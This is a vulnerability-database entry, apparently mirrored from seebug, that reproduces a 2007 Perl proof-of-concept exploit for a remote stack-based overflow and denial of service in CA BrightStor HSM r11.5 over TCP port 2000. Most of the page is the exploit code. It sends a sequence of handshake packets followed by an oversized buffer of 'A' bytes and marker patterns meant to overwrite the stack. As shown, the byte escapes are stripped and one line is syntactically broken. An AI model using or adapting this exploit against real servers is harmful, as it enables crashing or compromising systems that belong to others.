Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CA BrightStor HSM <= r11.5 Remote Stack Based Overflow / DoS

🗓️ 28 Oct 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 21 Views

CA BrightStor HSM r11.5 Remote Stack Overflow / DoS Vulnerabilit

Code

                                                #!/usr/bin/perl
#
# *
# *     C@@@@@  O@@@@@@@       C@@@@@  O@@@@@@O           C@@@@@@@@@o                                                                              
# *    C@@@@@@@@@@@@@@@@O     C@@@@@@@@@@@@@@@@O      C@@@@@@@@@@@@@o                                                                             
# *    C@@@@@@o  .8@@@@@@.    C@@@@@@o   8@@@@@@.    @@@@@@O     .@@o                                                                             
# *    C@@@@@      @@@@@@c    C@@@@@      @@@@@@c   C@@@@@c                                                                                       
# *    C@@@@@      O@@@@@:    C@@@@@      O@@@@@:   @@@@@@                                                                                        
# *    C@@@@@      O@@@@@:    C@@@@@      O@@@@@:   8@@@@@                                                                                        
# *    C@@@@@      O@@@@@:    C@@@@@      O@@@@@:   :@@@@@@        ::                                                                             
# *    C@@@@@      O@@@@@:    C@@@@@      O@@@@@:    c@@@@@@@Coo8@@@o                                                                             
# *    C@@@@@      O@@@@@:    C@@@@@      O@@@@@:      C@@@@@@@@@@@@o  
# *    
# *   [0x00001010]                                                                        
# *
# * Title: CA BrightStor HSM <= r11.5 Remote Stack Based Overflow / DoS
# * For: Windows XP (SP2 Professional) / Windows Server 2003 (Enterprise Edition)
# * Released by: NiceNameCrew [http://nnc.unkn0wn.eu]
# * Author: boecke <[email protected]>
# * Discovery: iDefense
# * Vulnerability Type: Remote Stack Overflow / DoS
# * Risk: High
# * TCP: 2000
# * 
# * This body, this body holding me, be my reminder here that I am not alone.
# *
#

use IO::Socket;

$handshake = 
"x14x00x00x00" .				#	[0x14000000] INIT_BEGIN 
"x42x00x00x00" . 				#	[0x42000000] FX_SET_CONSOLE_CREDENTIALS
"x07x00x00x00" . 				#	[0x07000000] GUI_FLAGS
"x00x00x00x00x00x00x00x00"; 	#	[0x00000000] END

# 0030  ff d1 7b ef 00 00 14 00  00 00 44 00 00 00 07 00   ..{..... ..D.....
# 0040  00 00 00 00 00 00 00 00  00 00                     ........ ..      

$handshake_auth =
"x14x00x00x00x44x00x00x00x07x00x00x00" .
"x00x00x00x00x00x00x00x00";

$handshake_auth2 =
"x14x00x00x00x03x00x00x00" .
"x07x00x00x00x00x00x00x00" .
"x08x00x00x00";

$handshake_auth3 =
"x14x00x00x00x32x00x00x00" .
"x07x00x00x00x00x00x00x00" .
"x1Cx00x00x00";

$handshake_auth4 =
"x14x00x00x00x1Cx00x00x00" .
"x07x00x00x00x00x00x00x00x00x00x00x00";

# List Network Locations
$drives =
"x14x00x00x00x0Fx00x00x00x07x00x00x00x00x00x00x00x00x00x00x00";

# List Computers on Network (MSHOME)
$computers =
"x1Ax00x00x00" .
"x27x00x00x00" .
"x07x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"x4Dx53x48x4Fx4Dx45" (MSHOME)

$damage =
"x40x05x00x00x1Dx00x00x00" .
"x07x00x00x00x00x00x00x00" .
"x00x00x00x00" .
"x41" x 1232 .
"BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK" .
"LLLLMMMMNNNNOOOOLOLO" .
"x41x42x43x44" .
"RRRRSSSSTTTTUUUU" .
"VVVVWWWW" .
"x2Ex41x3B" .
"x00x00x00x00x00x00";

if ( $socket = IO::Socket::INET->new( PeerAddr => "127.0.0.1", PeerPort => "2000", Proto => "TCP" ))
{
	print $socket $handshake;
	recv($socket, $reply, 256, 0);
	print($reply . "
");

	print $socket $handshake_auth;
	recv($socket, $reply, 256, 0);
	print($reply . "
");

	print $socket $handshake_auth2;
	recv($socket, $reply, 256, 0);
	print($reply . "
");

	print $socket $handshake_auth3;
	recv($socket, $reply, 256, 0);
	print($reply . "
");

	print $socket $handshake_auth4;
	recv($socket, $reply, 256, 0);
	print($reply . "
");

	print $socket $damage;
	recv($socket, $reply, 256, 0);
	print($reply . "
");
}

# sebug.net

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Oct 2007 00:00Current
7.1High risk
Vulners AI Score7.1
ca brightstor hsmremote stack overflowdoswindows xpwindows server 2003idefensetcp 2000
21